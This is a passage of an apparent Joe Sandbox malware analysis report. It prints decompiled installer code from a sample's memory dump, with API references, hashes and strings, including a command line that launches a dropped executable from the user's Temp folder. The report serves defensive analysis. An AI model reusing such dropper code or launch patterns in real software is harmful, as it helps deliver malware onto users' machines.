						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1720;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2788, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2788, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ed70 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79e560 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E63(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404214();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x7a1f5c; // 0xaff8b2
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a27b8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F55;
				E00403E41(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E41(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E63( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E76(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2790 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79dd54 =  *0x79dd54 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79ed70 =  *0x79ed70 & 0x00000000;
				return 0;
			}

0x00403f99
0x004040bf
0x0040411b
0x0040411f
0x004041f6
0x004041f8
0x004041f8
0x004041fe
0x004041fe
0x00404201
0x00000000
0x00404208
0x0040412d
0x0040412f
0x00404139
0x00404144
0x00404147
0x0040414a
0x00404155
0x00404158
0x0040415f
0x0040416d
0x00404185
0x00404198
0x004041a8
0x004041aa
0x004041aa
0x0040415f
0x004041b4
0x00000000
0x004041bf
0x004041c3
0x004041d4
0x004041d4
0x004041da
0x004041e8
0x004041e8
0x00000000
0x004041ec
0x004041b4
0x004040ca
0x00000000
0x004040de
0x004040e4
0x004040ea
0x00000000
0x00000000
0x0040410f
0x00404111
0x00404116
0x00000000
0x00404116
0x004040ca
0x00403f9f
0x00403fa2
0x00403fa7
0x00403fa9
0x00403fb8
0x00403fb8
0x00403fbf
0x00403fc2
0x00403fc4
0x00403fc9
0x00403fd2
0x00403fd8
0x00403fe4
0x00403fe7
0x00403ff0
0x00403ff5
0x00403ff8
0x00403ffd
0x00404014
0x0040401b
0x0040402e
0x00404031
0x00404046
0x0040404d
0x00404052
0x00404057
0x00404057
0x00404066
0x00404075
0x00404077
0x0040408d
0x0040409c
0x0040409e
0x00000000

APIs

CheckDlgButton.USER32 ref: 00404014
GetDlgItem.USER32 ref: 00404028
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404046
GetSysColor.USER32(?), ref: 00404057
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404066
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404075
lstrlenA.KERNEL32(?), ref: 0040407F
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040408D
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040409C
GetDlgItem.USER32 ref: 004040FF
SendMessageA.USER32(00000000), ref: 00404102
GetDlgItem.USER32 ref: 0040412D
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040416D
LoadCursorA.USER32 ref: 0040417C
SetCursor.USER32(00000000), ref: 00404185
ShellExecuteA.SHELL32(0000070B,open,007A1720,00000000,00000000,00000001), ref: 00404198
LoadCursorA.USER32 ref: 004041A5
SetCursor.USER32(00000000), ref: 004041A8
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041D4
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041E8

Strings

U?@, xrefs: 0040418D
N, xrefs: 0040411B
open, xrefs: 00404190
"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx, xrefs: 00404158

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx$N$U?@$open
API String ID: 3615053054-1149934553
Opcode ID: 92bc7d30add5040422666479656260734bf50b447b616a142327de249c34192a
Instruction ID: 3808a9aa72762e1b0a3c0630051113d329733426ad5bf4de87733bff4190569e
Opcode Fuzzy Hash: 92bc7d30add5040422666479656260734bf50b447b616a142327de249c34192a
Instruction Fuzzy Hash: 8E61E3B1A40309BFEB109F60CC45F6A7B69FB54715F108026FB057A2E1C7B8AA518B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2790;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a1f80, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2788;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,007A1F80,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e17b0976a1471b6a97cffa9bbfdfbee2ebc8f4b24d880ca6454463c24c0580b9
Instruction ID: b18c56ac4112042eb957d5973205181c35f11629612f22d5a80308a694461aa5
Opcode Fuzzy Hash: e17b0976a1471b6a97cffa9bbfdfbee2ebc8f4b24d880ca6454463c24c0580b9
Instruction Fuzzy Hash: D241AC71804249AFCB058F94CD459BFBFB9FF45315F00812AF961AA2A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004058D3 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004058D3(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F11(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x7a2810 =  *0x7a2810 + 1;
						return _t20;
					}
				}
				 *0x7a0f20 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7a0998, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x7a0598, "%s=%s\r\n", 0x7a0f20, 0x7a0998);
						_t56 = _t55 + 0x10;
						E00405BA7(_t43, 0x400, 0x7a0998, 0x7a0998,  *((intOrPtr*)( *0x7a2790 + 0x128)));
						_t20 = E0040585C(0x7a0998, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057D1(_t26 + 0xa, 0x409404);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040581D(_t51 + _t29, 0x7a0598, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040585C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x7a0f20, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004058d9
0x004058e0
0x004058e4
0x004058ed
0x004058f1
0x00405a30
0x00405a30
0x00000000
0x00405a30
0x004058f1
0x004058fd
0x00405913
0x0040593b
0x00405946
0x0040594a
0x0040596a
0x00405971
0x0040597b
0x00405988
0x0040598d
0x00405992
0x00405996
0x00000000
0x00000000
0x004059a5
0x004059a7
0x004059b4
0x004059b8
0x00405a29
0x00405a2a
0x00000000
0x004059d4
0x004059e1
0x00405a46
0x00405a4d
0x004059f4
0x004059f4
0x004059f6
0x004059ff
0x00405a0a
0x00405a1c
0x00405a23
0x00000000
0x00405a23
0x00405a4f
0x00405a50
0x00405a55
0x00405a57
0x00405a64
0x00405a64
0x00405a68
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a59
0x00405a59
0x00405a5c
0x00405a5f
0x00405a60
0x00000000
0x00405a59
0x004059ec
0x004059f1
0x00000000
0x004059f1
0x004059b8
0x00405915
0x00405920
0x00405929
0x0040592d
0x00000000
0x00000000
0x0040592d
0x00405a3a

APIs

Part of subcall function 00405F11: GetModuleHandleA.KERNEL32(?,?,00000000,0040315D,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F23
Part of subcall function 00405F11: GetProcAddress.KERNEL32(00000000,?), ref: 00405F3E

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,00405668,?,00000000,000000F1,?), ref: 00405920
GetShortPathNameA.KERNEL32 ref: 00405929
GetShortPathNameA.KERNEL32 ref: 00405946
wsprintfA.USER32 ref: 00405964
GetFileSize.KERNEL32(00000000,00000000,007A0998,C0000000,00000004,007A0998,?,?,?,00000000,000000F1,?), ref: 0040599F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0598,00000000,-0000000A,00409404,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A0A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A1C
GlobalFree.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A2A

Part of subcall function 004057D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057D8
Part of subcall function 004057D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405808

Strings

[Rename], xrefs: 004059D4, 004059E6
%s=%s, xrefs: 0040595A

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3445103937-1727408572
Opcode ID: f68c7b9b628275f9044d2ceff897b5bd5e81f31a14f73e5983168c9bd26b8fae
Instruction ID: 924cdd3278eb3db0a3dcabfd255c7baad0c35c1dcd665c85b0a3f6bd7b97b664
Opcode Fuzzy Hash: f68c7b9b628275f9044d2ceff897b5bd5e81f31a14f73e5983168c9bd26b8fae
Instruction Fuzzy Hash: 7F41E271605B01BBD7206B619C89F6B3A5CDB85758F14053AFE05F62C2E63CA801CEAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405BA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405BA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x7a1f5c; // 0xaff8b2
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t74 =  *0x7a27b8 + _t36;
				_t37 = 0x7a1720;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x7a1720;
				if(_a4 - 0x7a1720 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BA7(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x7a1720;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x7a3000;
							E00405B85(_t86, (_t95 << 0xa) + 0x7a3000);
						} else {
							E00405AE3(_t86,  *0x7a2788);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DE7(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x7a2804;
						if( *0x7a2804 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x7a2784;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x7a2788,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x7a2788,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x7a27b8;
							E00405A6C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7a27b8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BA7(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B85(_a4, _t37);
			}

0x00405ba7
0x00405ba7
0x00405ba7
0x00405bad
0x00405bb2
0x00405bb4
0x00405bc3
0x00405bc3
0x00405bce
0x00405bd0
0x00405bd5
0x00405bd8
0x00405bd9
0x00405be0
0x00405be2
0x00405be8
0x00405beb
0x00405beb
0x00405dc4
0x00405dc4
0x00405dc8
0x00000000
0x00000000
0x00405bf8
0x00405bfe
0x00000000
0x00000000
0x00405c04
0x00405c05
0x00405c08
0x00405c0b
0x00405db7
0x00405dc1
0x00405dc3
0x00405dc3
0x00405db9
0x00405dbb
0x00405dbd
0x00405dbe
0x00405dbe
0x00000000
0x00405db7
0x00405c11
0x00405c15
0x00405c25
0x00405c29
0x00405c30
0x00405c33
0x00405c37
0x00405c3d
0x00405c40
0x00405c43
0x00405c46
0x00405d61
0x00405d64
0x00405d94
0x00405d97
0x00405d9c
0x00405da0
0x00405da0
0x00405da5
0x00405da6
0x00405dab
0x00405dae
0x00405db0
0x00000000
0x00405db0
0x00405d66
0x00405d69
0x00405d7e
0x00405d85
0x00405d6b
0x00405d72
0x00405d72
0x00405d8d
0x00405d90
0x00405d59
0x00405d5a
0x00405d5a
0x00000000
0x00405d90
0x00405c4e
0x00405c4f
0x00405c55
0x00405c57
0x00405c71
0x00405c71
0x00405c78
0x00405c78
0x00405c7f
0x00405c83
0x00405c83
0x00405c84
0x00405c86
0x00405cbf
0x00405cc2
0x00405cd2
0x00405cd5
0x00405cdd
0x00405ce3
0x00405ce3
0x00405d3f
0x00405d3f
0x00405d41
0x00000000
0x00000000
0x00405ce7
0x00405cee
0x00405cef
0x00405cf1
0x00405d0b
0x00405d19
0x00405d1f
0x00405d21
0x00405d3c
0x00405d3c
0x00405d3c
0x00000000
0x00405d3c
0x00405d27
0x00405d32
0x00405d38
0x00405d3a
0x00000000
0x00000000
0x00000000
0x00405d3a
0x00405cf3
0x00405cf6
0x00000000
0x00000000
0x00405d05
0x00405d07
0x00405d09
0x00000000
0x00000000
0x00000000
0x00405d09
0x00000000
0x00405d3f
0x00405cca
0x00000000
0x00405c88
0x00405c8d
0x00405ca3
0x00405ca8
0x00405cab
0x00405d48
0x00405d48
0x00405d4c
0x00405d54
0x00405d54
0x00000000
0x00405d4c
0x00405cb5
0x00405d43
0x00405d43
0x00405d46
0x00000000
0x00000000
0x00000000
0x00405d46
0x00405c86
0x00405c59
0x00405c5d
0x00000000
0x00000000
0x00405c5f
0x00405c63
0x00000000
0x00000000
0x00405c65
0x00405c69
0x00000000
0x00405c6b
0x00405c6b
0x00000000
0x00405c6b
0x00405c69
0x00405dce
0x00405dd8
0x00405de4
0x00405de4
0x00000000

APIs

GetVersion.KERNEL32(?,0079E568,00000000,00404EA9,0079E568,00000000), ref: 00405C4F
GetSystemDirectoryA.KERNEL32 ref: 00405CCA
GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,00000400), ref: 00405CDD
SHGetSpecialFolderLocation.SHELL32(?,0078F738), ref: 00405D19
SHGetPathFromIDListA.SHELL32(0078F738,"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx), ref: 00405D27
CoTaskMemFree.OLE32(0078F738), ref: 00405D32
lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D54
lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx,?,0079E568,00000000,00404EA9,0079E568,00000000), ref: 00405DA6

Strings

